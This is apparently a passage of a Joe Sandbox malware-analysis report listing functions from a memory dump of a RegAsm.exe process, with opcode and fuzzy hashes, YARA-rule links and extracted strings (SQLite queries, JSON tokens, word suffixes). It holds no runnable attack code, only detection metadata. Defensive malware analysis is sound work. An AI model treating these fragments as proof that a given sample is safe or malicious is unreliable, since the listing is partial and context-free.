Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bebc2205bf665d9e62f953e7dddfa37ec45d91e25232bda72014aaaf6124a9de
Instruction ID: 3559d1c802e24a9b256d38bd1c0691e015ce79746017865ea9437725e8f07286
Opcode Fuzzy Hash: bebc2205bf665d9e62f953e7dddfa37ec45d91e25232bda72014aaaf6124a9de
Instruction Fuzzy Hash: DCE002B950535DAFDB00CF09D894ADABBA8FB09264F50811AFD1857301C375E961CBE1

Function 61E2D8B8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bc46c8122d7ec2c0d3e85d99e06002b58141c25f7dac85a939e33f12ea64f0c
Instruction ID: 0c6bb8ec670fbf06178dafeec3c5f151ae9a42d8b6ea8cc00f9de22d3b6fc0e1
Opcode Fuzzy Hash: 4bc46c8122d7ec2c0d3e85d99e06002b58141c25f7dac85a939e33f12ea64f0c
Instruction Fuzzy Hash: 83E0B6B550531DAFCB00CF09D880ACABBA8FB08260F10811AFD145B300C371E910CBE0

Function 61E2D635 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
Instruction ID: e794d2b72a1fc6c6090aef49fcd2ae8b4ab6f64d521491744c60cc3bf2b3839a
Opcode Fuzzy Hash: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
Instruction Fuzzy Hash: 8ED092B8909349AFCB00EF29C48544EBBE4BF88258F40C82DFC98C7311E274E8408F92

Function 61E038DC Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40af0c36dbf5a0f884e18cc3b6e49f381d70d038c9458a678f14876bb3249447
Instruction ID: 5d8a4dcf50b240acca679c383b9083a7302e11f974503154b2c6ec1cc823b236
Opcode Fuzzy Hash: 40af0c36dbf5a0f884e18cc3b6e49f381d70d038c9458a678f14876bb3249447
Instruction Fuzzy Hash: D9C01230244308CFEB40CAAED480A62B3E9BB44A24F50C0A0E808CB340DA30F9118690

Function 61E038CA Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
Instruction ID: 67d68dba2000bb8482a24fc023f268fc16b477c73c548bd02e1b99648bc578f6
Opcode Fuzzy Hash: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
Instruction Fuzzy Hash: C9B09B2071430D565708CE549440977779DB784905724C455D81C85505E735E59152D0

Function 61E037F3 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c758f56ce800b0edb1a3b6b4920dd8d203c929418ffadd695cc457fe8d80d330
Instruction ID: de6271d013a038b850d850acc4260bf908e6486e870890920c4c51f453ae2ee2
Opcode Fuzzy Hash: c758f56ce800b0edb1a3b6b4920dd8d203c929418ffadd695cc457fe8d80d330
Instruction Fuzzy Hash: C7B0123B11030CCB4700DD0DD441CC1B3D8F708E127C104D0E41087701D669F800C685

Function 61E0FD8A Relevance: 30.3, APIs: 13, Strings: 7, Instructions: 320COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E0FDAF
memcmp.MSVCRT ref: 61E0FE00
memcmp.MSVCRT ref: 61E10580

Strings

ive, xrefs: 61E1063A
ous, xrefs: 61E10618
ate, xrefs: 61E105D5
ize, xrefs: 61E1065C
iti, xrefs: 61E105FC
ance, xrefs: 61E103AD
ence, xrefs: 61E103D4

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$iti$ive$ize$ous
API String ID: 1475443563-1713922985
Opcode ID: 9706f2438f5f9958a9f504a1a89414024658d7dc0fe24dd8d85b57cc53bebf8a
Instruction ID: 14175bb5b9193900e4a9b0b479f9e4e43aad601f0e58a5cb96228bda6cff1173
Opcode Fuzzy Hash: 9706f2438f5f9958a9f504a1a89414024658d7dc0fe24dd8d85b57cc53bebf8a
Instruction Fuzzy Hash: D0D127B0E09306CBDB01DF94C58269EBBF4AF85348F31C81AD8909B354D779D9668B92

Function 61E0FFDF Relevance: 28.8, APIs: 12, Strings: 7, Instructions: 293COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E10004
memcmp.MSVCRT ref: 61E10036
memcmp.MSVCRT ref: 61E1006E
memcmp.MSVCRT ref: 61E101F8
memcmp.MSVCRT ref: 61E103BB
memcmp.MSVCRT ref: 61E10580
memcmp.MSVCRT ref: 61E10669
memcmp.MSVCRT ref: 61E1070B

Strings

ive, xrefs: 61E1063A
ous, xrefs: 61E10618
ate, xrefs: 61E105D5
ize, xrefs: 61E1065C
iti, xrefs: 61E105FC
ance, xrefs: 61E103AD
ence, xrefs: 61E103D4

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$iti$ive$ize$ous
API String ID: 1475443563-1713922985
Opcode ID: b669a7a1187de0fce9b6595f66bcea219431e2422beeabc80f0d4f1047ca061f
Instruction ID: 8af95de5a1172c954fa437990dc91da2b279e7fac1ed370a937824a3edc9c215
Opcode Fuzzy Hash: b669a7a1187de0fce9b6595f66bcea219431e2422beeabc80f0d4f1047ca061f
Instruction Fuzzy Hash: EFC137B0E0C3068BDB009F94C58269EBBF4AF85348F31C81EE894DB754D779D5A68B52

Function 61E0FEFD Relevance: 27.3, APIs: 11, Strings: 7, Instructions: 287COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E0FF1E
memcmp.MSVCRT ref: 61E0FF6B
memcmp.MSVCRT ref: 61E0FFB2
memcmp.MSVCRT ref: 61E10580

Strings

ive, xrefs: 61E1063A
ous, xrefs: 61E10618
ate, xrefs: 61E105D5
ize, xrefs: 61E1065C
iti, xrefs: 61E105FC
ance, xrefs: 61E103AD
ence, xrefs: 61E103D4

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$iti$ive$ize$ous
API String ID: 1475443563-1713922985
Opcode ID: ed99b8ed2c93518955057c8a185e88c665ba01599eeeff3c7ab09e33224a8f47
Instruction ID: 3235e3b978ee00cfabdc0942405c464718558a8f08fb1430455de202698b3b76
Opcode Fuzzy Hash: ed99b8ed2c93518955057c8a185e88c665ba01599eeeff3c7ab09e33224a8f47
Instruction Fuzzy Hash: 1EC127B0D083068BDB00DF94C58269EBBF4AF85348F31C81ED890DB754D779D9A68B92

Function 61E100D7 Relevance: 27.3, APIs: 11, Strings: 7, Instructions: 280COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E100FC
memcmp.MSVCRT ref: 61E10131
memcmp.MSVCRT ref: 61E10580

Strings

ive, xrefs: 61E1063A
ous, xrefs: 61E10618
ate, xrefs: 61E105D5
ize, xrefs: 61E1065C
iti, xrefs: 61E105FC
ance, xrefs: 61E103AD
ence, xrefs: 61E103D4

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$iti$ive$ize$ous
API String ID: 1475443563-1713922985
Opcode ID: 5306eb8679e29c7ccae58c152c61b3cb2e43ab0ad82d1b8259ffa351aff7fd54
Instruction ID: a6745917a23cee73da34d97950539bfd860ce037a133a9b2c34405b562b65f13
Opcode Fuzzy Hash: 5306eb8679e29c7ccae58c152c61b3cb2e43ab0ad82d1b8259ffa351aff7fd54
Instruction Fuzzy Hash: 90C127B0E083068BDB00DF94C58669EBBF4AF85348F31C81ED890DB754D779D5A68B92

Function 61E0FBCF Relevance: 25.8, APIs: 10, Strings: 7, Instructions: 268COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E0FBF0
memcmp.MSVCRT ref: 61E0FC37
memcmp.MSVCRT ref: 61E10580

Strings

ive, xrefs: 61E1063A
ous, xrefs: 61E10618
ate, xrefs: 61E105D5
ize, xrefs: 61E1065C
iti, xrefs: 61E105FC
ance, xrefs: 61E103AD
ence, xrefs: 61E103D4

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$iti$ive$ize$ous
API String ID: 1475443563-1713922985
Opcode ID: e540365b7fd7f9443dd82ee147f8b9093e47f334e53584792075e5945152a348
Instruction ID: 60f9232e79ba8c46656df14b30f4429a15bc78d1e5e1648a3d40d26d176db9d4
Opcode Fuzzy Hash: e540365b7fd7f9443dd82ee147f8b9093e47f334e53584792075e5945152a348
Instruction Fuzzy Hash: 6EB128B0D0D3068BDB00CF94C58669EBBF4AF85348F31C81AD890DB754D779D9A68B92

Function 61E0FC61 Relevance: 25.8, APIs: 10, Strings: 7, Instructions: 259COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E0FC86
memcmp.MSVCRT ref: 61E0FCBF
memcmp.MSVCRT ref: 61E10580

Strings

ive, xrefs: 61E1063A
ous, xrefs: 61E10618
ate, xrefs: 61E105D5
ize, xrefs: 61E1065C
iti, xrefs: 61E105FC
ance, xrefs: 61E103AD
ence, xrefs: 61E103D4

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$iti$ive$ize$ous
API String ID: 1475443563-1713922985
Opcode ID: 0a817a664abe7669e1f9b819d607d3cf4ee08d2d7d4e2fd3f7bc486b0ed951a3
Instruction ID: 2b4bda0a5a7416114e6a254efe1c2f62446bd14a06bd16ad799116575b7de764
Opcode Fuzzy Hash: 0a817a664abe7669e1f9b819d607d3cf4ee08d2d7d4e2fd3f7bc486b0ed951a3
Instruction Fuzzy Hash: 03B126B0D0C3068BDB00DF94C58269EBBF4AF85348F31C81AD890DB754D779D9A68B92

Function 61E0FD37 Relevance: 24.2, APIs: 9, Strings: 7, Instructions: 248COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E0FD5C
memcmp.MSVCRT ref: 61E101F8
memcmp.MSVCRT ref: 61E103BB
memcmp.MSVCRT ref: 61E10580
memcmp.MSVCRT ref: 61E10669
memcmp.MSVCRT ref: 61E1070B

Strings

ive, xrefs: 61E1063A
ous, xrefs: 61E10618
ate, xrefs: 61E105D5
ize, xrefs: 61E1065C
iti, xrefs: 61E105FC
ance, xrefs: 61E103AD
ence, xrefs: 61E103D4

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$iti$ive$ize$ous
API String ID: 1475443563-1713922985
Opcode ID: c54270305458f61258e2551f56d469756e9d85375da6b675864f5ba64181ee46
Instruction ID: c635636e61c9daa50d7aef90f17bbd02a00a8acd362d6d180f064c5e09d29bb5
Opcode Fuzzy Hash: c54270305458f61258e2551f56d469756e9d85375da6b675864f5ba64181ee46
Instruction Fuzzy Hash: B0A126B0D0C306CBDB00CF94C58669EBBF4AB85348F31C81AD894DB754D779D9A68B92

Function 61E0FCE9 Relevance: 24.2, APIs: 9, Strings: 7, Instructions: 248COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E0FD0E
memcmp.MSVCRT ref: 61E101F8
memcmp.MSVCRT ref: 61E103BB
memcmp.MSVCRT ref: 61E10580
memcmp.MSVCRT ref: 61E10669
memcmp.MSVCRT ref: 61E1070B

Strings

ive, xrefs: 61E1063A
ous, xrefs: 61E10618
ate, xrefs: 61E105D5
ize, xrefs: 61E1065C
iti, xrefs: 61E105FC
ance, xrefs: 61E103AD
ence, xrefs: 61E103D4

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: memcmp
String ID: ance$ate$ence$iti$ive$ize$ous
API String ID: 1475443563-1713922985
Opcode ID: c1250c06479d443b50863cfaca24b1a96d4c7a6c86a02d8b32de734b66d4155d
Instruction ID: 52be5bc32e4a241d7d631e7d354cb647d2df2ea9c6509ea900c66bb21baa7349
Opcode Fuzzy Hash: c1250c06479d443b50863cfaca24b1a96d4c7a6c86a02d8b32de734b66d4155d
Instruction Fuzzy Hash: 9DA127B0D0C306CBDB00DF94C58669EBBF4AB85348F31C81AD890DB754D779D9A68B92

Function 61E970B9 Relevance: 16.9, APIs: 1, Strings: 10, Instructions: 447COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E97281

Part of subcall function 61E0AE03: free.MSVCRT ref: 61E0AE3D

Strings

sqlite_stat1, xrefs: 61E97504
bua, xrefs: 61E97368
WHERE , xrefs: 61E97357
UPDATE main., xrefs: 61E9730B
= ?, xrefs: 61E97571
IS ?, xrefs: 61E975EC
AND , xrefs: 61E97604
idx IS CASE WHEN length(?4)=0 AND typeof(?4)='blob' THEN NULL ELSE ?4 END , xrefs: 61E975CB
SET , xrefs: 61E9732E
bua, xrefs: 61E9733E

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: freememcmp
String ID: = ?$ AND $ IS ?$ SET $ WHERE $UPDATE main.$bua$bua$idx IS CASE WHEN length(?4)=0 AND typeof(?4)='blob' THEN NULL ELSE ?4 END $sqlite_stat1
API String ID: 1183899719-1341641573
Opcode ID: 64ffc3348e5e410702e848c8edd78b134323dad80dcbaa00aa6c1ed7fa469ecb
Instruction ID: 0d5b731b4e6e71452f02b40a28acc7cf76705435dae47c5a45c9821af7cd2139
Opcode Fuzzy Hash: 64ffc3348e5e410702e848c8edd78b134323dad80dcbaa00aa6c1ed7fa469ecb
Instruction Fuzzy Hash: AE12E774E04259DBDB04CF98D480A9DBBF2BF88308F25C869E855AB351D774E886CF81

Function 61E3C943 Relevance: 16.9, APIs: 3, Strings: 8, Instructions: 360stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 61E3CC03
strncmp.MSVCRT ref: 61E3CC58
strncmp.MSVCRT ref: 61E3CCA9

Strings

false, xrefs: 61E3CC9E
-, xrefs: 61E3CD00
null, xrefs: 61E3CBF8
], xrefs: 61E3CDC5
true, xrefs: 61E3CC4D
}, xrefs: 61E3CDBB
0, xrefs: 61E3CCF9
-, xrefs: 61E3CCF0

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
